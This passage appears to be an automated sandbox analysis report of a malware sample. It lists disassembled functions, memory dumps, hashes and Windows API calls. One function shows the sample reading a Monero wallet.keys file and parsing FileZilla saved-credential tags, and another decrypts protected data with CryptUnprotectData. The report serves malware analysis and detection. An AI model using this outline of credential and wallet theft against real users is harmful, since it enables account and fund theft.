                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: IWw$_b~x$E-b
                    • API String ID: 0-3288455321
                    • Opcode ID: 4f1d4ac2d3e710e79ad5c1374f8cce5efe714a34a21714d06835ff9dbd98d4b6
                    • Instruction ID: 79cddcaed6c7c829b0b1ae42a6ee0d7b0ee25885c5dd35990fd273fcc11fcf80
                    • Opcode Fuzzy Hash: 4f1d4ac2d3e710e79ad5c1374f8cce5efe714a34a21714d06835ff9dbd98d4b6
                    • Instruction Fuzzy Hash: 07922AF3A0C2109FE704AE2DEC8567AB7E9EFD4320F1A893DE6C5D7344E67558018692
                    Function 00483720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                    Download Yara Rule
                    APIs
                    • CoCreateInstance.COMBASE(0048E118,00000000,00000001,0048E108,00000000), ref: 00483758
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004837B0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID:
                    • API String ID: 123533781-0
                    • Opcode ID: a730e269f0538d2a576d007567367cbefb533ea0c56770e044f7f80ca402b27d
                    • Instruction ID: 5d1de4879c794ef8d804a5cdc3c80e602324faf45b7f02459bf134f82901a0a5
                    • Opcode Fuzzy Hash: a730e269f0538d2a576d007567367cbefb533ea0c56770e044f7f80ca402b27d
                    • Instruction Fuzzy Hash: 4C410770A00A289FDB24EF58CC94B9BB7B5BB48706F4055D9E608A7290D7716EC5CF50
                    Function 00479B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00479B84
                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00479BA3
                    • LocalFree.KERNEL32(?), ref: 00479BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$AllocCryptDataFreeUnprotect
                    • String ID:
                    • API String ID: 2068576380-0
                    • Opcode ID: 58aa950c16a003f17b60492495eb398ced476805fba0b93113998abae7d0d857
                    • Instruction ID: fe0fdf77ed0c22c6e831f70cb7c25c960a6282a2aa3a68c4694b30a40ca132ca
                    • Opcode Fuzzy Hash: 58aa950c16a003f17b60492495eb398ced476805fba0b93113998abae7d0d857
                    • Instruction Fuzzy Hash: 891109B8A00209EFDB04DF94D985AAEB7B5FF89300F104599E815A7350D774AE54CFA1
                    Function 00791E63 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: @w/
                    • API String ID: 0-1462114854
                    • Opcode ID: 850ed8d1cf0e611b3ae9911c0184da492441227e10c2ae52d3156e020b2fd115
                    • Instruction ID: 2f1089c656e12c0ed688180c671ddae1862dcd6b7b7055ff34b692ebc5feef50
                    • Opcode Fuzzy Hash: 850ed8d1cf0e611b3ae9911c0184da492441227e10c2ae52d3156e020b2fd115
                    • Instruction Fuzzy Hash: 7C515EF361C3049FE7086E7DEC9873A77D5EB54320F2A463DEAC597384E97518058286
                    Function 0079E1FD Relevance: .2, Instructions: 227COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d7c5cd7d5efe8fec6fc98bf58db4b5817cb7bc1993ade98db71cf61c09c68722
                    • Instruction ID: d108404e64fe00beee418bd34e1c50278f859d6845e5ddbc06f3f6f606fed7b8
                    • Opcode Fuzzy Hash: d7c5cd7d5efe8fec6fc98bf58db4b5817cb7bc1993ade98db71cf61c09c68722
                    • Instruction Fuzzy Hash: E27106B3E182109FE3086E38DC1537AB7E9EF94320F1B453DDAC697784DA7558408782
                    Function 007C03EB Relevance: .2, Instructions: 212COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c1d014bec99a00a36b0d388d195b42a1eac706c33435ac608450508ca7345eb
                    • Instruction ID: a63416edb0f418e4cf072641a1572a597f16ff81aee9d1af5053595d3f2924f4
                    • Opcode Fuzzy Hash: 4c1d014bec99a00a36b0d388d195b42a1eac706c33435ac608450508ca7345eb
                    • Instruction Fuzzy Hash: CD61D1B39082149FE344AE28DC8677AB7E5EF58710F1B093DDAC5D3340EA7968158B87
                    Function 007C65EE Relevance: .2, Instructions: 167COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1b41cdc0cbf5fd2a68baabf784dfb21e1a5cd52bfa981ae2ca96f2d826adb020
                    • Instruction ID: 04d56ee636786282cb161d677817c5a5be1c6c379ffbc515794b3c664e718003
                    • Opcode Fuzzy Hash: 1b41cdc0cbf5fd2a68baabf784dfb21e1a5cd52bfa981ae2ca96f2d826adb020
                    • Instruction Fuzzy Hash: 6451F0F39082109BE318AF1AEC8477BFBE5EFD4760F16853DDAC983340E53949058696
                    Function 0081405A Relevance: .1, Instructions: 142COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a78ab0960e147ea62ab178a861edccba462277a8ef5e582166af59d725dac30
                    • Instruction ID: 20e6a644cfcfcd8dd8939c29c3d1db01cf55435793a0883f0d4a377d7dcd7ae2
                    • Opcode Fuzzy Hash: 3a78ab0960e147ea62ab178a861edccba462277a8ef5e582166af59d725dac30
                    • Instruction Fuzzy Hash: 88415BF3E145248BE7145929EC08766BAD6DBD0730F2A853DDE8893784EC7E480682D5
                    Function 007D525A Relevance: .1, Instructions: 121COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2c39d754ec1135b39bb8c5949df7cc19cbddaa7ab486dc849ecf4ebfbd69648a
                    • Instruction ID: f4cab7aa385c4d1b4a0ca3c1a5fc0a80c42ab33deeff9a48bdd6423c48ac4e8e
                    • Opcode Fuzzy Hash: 2c39d754ec1135b39bb8c5949df7cc19cbddaa7ab486dc849ecf4ebfbd69648a
                    • Instruction Fuzzy Hash: DC41F5F3A086144FF3146E2CDC8972AB7E5EB48320F57463DDAD9E3384E97958058786
                    Function 00489750 Relevance: .0, Instructions: 15COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    Function 00480250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00490DBA,00490DB7,00490DB6,00490DB3), ref: 00480362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00480369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00480385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 004803CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 004803DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00480419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00480463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00480562
                    • lstrcat.KERNEL32(?,profile: null), ref: 00480571
                    • lstrcat.KERNEL32(?,url: ), ref: 00480580
                    • lstrcat.KERNEL32(?,00000000), ref: 00480593
                    • lstrcat.KERNEL32(?,00491678), ref: 004805A2
                    • lstrcat.KERNEL32(?,00000000), ref: 004805B5
                    • lstrcat.KERNEL32(?,0049167C), ref: 004805C4
                    • lstrcat.KERNEL32(?,login: ), ref: 004805D3
                    • lstrcat.KERNEL32(?,00000000), ref: 004805E6
                    • lstrcat.KERNEL32(?,00491688), ref: 004805F5
                    • lstrcat.KERNEL32(?,password: ), ref: 00480604
                    • lstrcat.KERNEL32(?,00000000), ref: 00480617
                    • lstrcat.KERNEL32(?,00491698), ref: 00480626
                    • lstrcat.KERNEL32(?,0049169C), ref: 00480635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
